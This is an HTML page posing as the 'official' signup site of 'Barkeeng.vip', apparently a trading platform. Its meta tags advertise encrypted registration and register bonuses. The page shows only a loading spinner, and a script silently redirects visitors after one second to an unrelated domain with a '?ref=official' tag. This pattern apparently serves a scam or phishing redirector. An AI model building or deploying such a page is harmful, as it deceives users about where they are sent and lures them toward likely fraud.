<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta
      name="description"
      content="Official Website, New member, Signup page, Welcome to Barkeeng, Encrypted Registration the Password Is Stored in a Decentralized Way. Enjoy professional platform, instant order execution, low fees, and friendly 24/7 support."
    />
    <meta
      name="keywords"
      content="Official Website, New member, Signup page, Welcome to Barkeeng, Welcome Gifts, Encrypted Registration, Today Register Bonus, Newmember"
    />
    <meta property="og:title" content="Barkeeng The best platform" />
    <meta
      property="og:description"
      content="Official Website, New member, Signup page, Welcome to Barkeeng, Encrypted Registration the Password Is Stored in a Decentralized Way. Enjoy professional platform, instant order execution, low fees, and friendly 24/7 support."
    />
    <meta property="og:image" content="Barkeeng.vip" />
    <meta property="og:url" content="Barkeeng.vip" />
    <meta property="og:error" content="Barkeeng.vip" />
    <title>Barkeeng.vip - About</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        background: #262626;
      }
      .ring {
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 150px;
        height: 150px;
        background: transparent;
        border: 3px solid #3c3c3c;
        border-radius: 50%;
        text-align: center;
        line-height: 150px;
        font-family: sans-serif;
        font-size: 20px;
        color: lightgreen;
        letter-spacing: 4px;
        text-transform: uppercase;
        text-shadow: 0 0 10px green;
        box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
      }
      .ring:before {
        content: '';
        position: absolute;
        top: -3px;
        left: -3px;
        width: 100%;
        height: 100%;
        border: 3px solid transparent;
        border-top: 3px solid lightgreen;
        border-right: 3px solid lightgreen;
        border-radius: 50%;
        animation: animateC 2s linear infinite;
      }
      span {
        display: block;
        position: absolute;
        top: calc(50% - 2px);
        left: 50%;
        width: 50%;
        height: 4px;
        background: transparent;
        transform-origin: left;
        animation: animate 2s linear infinite;
      }
      span:before {
        content: '';
        position: absolute;
        width: 16px;
        height: 16px;
        border-radius: 50%;
        background: lightgreen;
        top: -6px;
        right: -8px;
        box-shadow: 0 0 20px lightgreen;
      }
      @keyframes animateC {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }
      @keyframes animate {
        0% {
          transform: rotate(45deg);
        }
        100% {
          transform: rotate(405deg);
        }
      }
    </style>
  </head>
  <body>
    <div class="ring">
      <div id="filename"></div>
      <span></span>
    </div>
    <script>
      window.onload = function () {
        // Get the current file name
        var filename = location.pathname.split('/').pop().replace('.html', '');

        // Update the text content of the span element
        document.getElementById('filename').textContent = filename;

        setTimeout(() => {
          // Redirect to the target URL
          window.location = 'https://grenagro.com/?ref=official';
        }, 1000);
      };
    </script>
  </body>
</html>
